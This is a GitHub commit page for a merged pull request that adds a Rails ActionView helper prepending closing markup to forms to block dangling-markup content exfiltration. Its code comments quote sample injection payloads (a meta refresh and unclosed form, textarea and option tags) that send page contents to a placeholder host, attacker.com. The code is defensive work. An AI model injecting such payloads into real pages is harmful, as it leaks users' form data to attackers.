Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #44472 from camertron/content_injection_prevention
Add additional content injection prevention to form HTML
- Loading branch information
Showing
8 changed files
with
130 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
68 changes: 68 additions & 0 deletions
68
actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,68 @@ | ||
# frozen_string_literal: true | ||
|
||
module ActionView | ||
module Helpers | ||
module ContentExfiltrationPreventionHelper | ||
mattr_accessor :prepend_content_exfiltration_prevention, default: false | ||
|
||
# Close any open attributes before each form tag. This prevents attackers from | ||
# injecting partial tags that could leak markup offsite. | ||
# | ||
# For example, an attacker might inject: | ||
# | ||
# <meta http-equiv="refresh" content='0;URL=https://attacker.com? | ||
# | ||
# The HTML following this tag, up until the next single quote would be sent to | ||
# https://attacker.com. By closing any open attributes, we ensure that form | ||
# contents are never exfiltrated this way. | ||
CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze | ||
|
||
# Close any open tags that support CDATA (textarea, xmp) before each form tag. | ||
# This prevents attackers from injecting unclosed tags that could capture | ||
# form contents. | ||
# | ||
# For example, an attacker might inject: | ||
# | ||
# <form action="https://attacker.com"><textarea> | ||
# | ||
# The HTML following this tag, up until the next `</textarea>` or the end of | ||
# the document would be captured by the attacker's <textarea>. By closing any | ||
# open textarea tags, we ensure that form contents are never exfiltrated. | ||
CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze | ||
|
||
# Close any open option tags before each form tag. This prevents attackers | ||
# from injecting unclosed options that could leak markup offsite. | ||
# | ||
# For example, an attacker might inject: | ||
# | ||
# <form action="https://attacker.com"><option> | ||
# | ||
# The HTML following this tag, up until the next `</option>` or the end of | ||
# the document would be captured by the attacker's <option>. By closing any | ||
# open option tags, we ensure that form contents are never exfiltrated. | ||
CLOSE_OPTION_TAG = "</option>".html_safe.freeze | ||
|
||
# Close any open form tags before each new form tag. This prevents attackers | ||
# from injecting unclosed forms that could leak markup offsite. | ||
# | ||
# For example, an attacker might inject: | ||
# | ||
# <form action="https://attacker.com"> | ||
# | ||
# The form elements following this tag, up until the next `</form>` would be | ||
# captured by the attacker's <form>. By closing any open form tags, we | ||
# ensure that form contents are never exfiltrated. | ||
CLOSE_FORM_TAG = "</form>".html_safe.freeze | ||
|
||
CONTENT_EXFILTRATION_PREVENTION_MARKUP = (CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze | ||
|
||
def prevent_content_exfiltration(html) | ||
if prepend_content_exfiltration_prevention | ||
CONTENT_EXFILTRATION_PREVENTION_MARKUP + html | ||
else | ||
html | ||
end | ||
end | ||
end | ||
end | ||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters